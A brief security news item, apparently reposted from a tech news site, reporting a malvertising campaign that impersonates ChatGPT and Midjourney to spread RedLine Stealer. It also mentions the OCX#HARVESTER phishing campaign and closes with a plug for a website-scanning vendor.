Malicious Google Search ads are being used as part of a BATLOADER campaign to deliver RedLine Stealer malware to unsuspecting users. These ads are targeting popular generative AI services such as OpenAI ChatGPT and Midjourney, which lack first-party standalone apps, and redirecting users to fake websites. Upon clicking the malicious ad, the user is presented with an executable file and a PowerShell script that downloads and loads the malware from a remote server. Additionally, the binary makes use of Microsoft Edge WebView2 to load the legitimate ChatGPT and Midjourney URLs in a pop-up window to avoid detection. This is not the first time the BATLOADER operators have taken advantage of the AI craze to spread malware, as similar attacks were seen in March 2023. Google is taking active steps to reduce the exploitation of its search engine, as the abuse of its ads has dropped since its peak in early 2023. This follows another phishing campaign called OCX#HARVESTER, which targeted the cryptocurrency sector between December 2022 and March 2023 using the More_eggs JavaScript downloader. The two key operators behind the malware-as-a-service have been identified as a Canadian and a Romanian national.
Source: Hackernews
To mitigate these potential threats, it is important to implement additional cybersecurity measures with the help of a trusted partner like INFRA www.infrascan.net or you can try your self using check.website.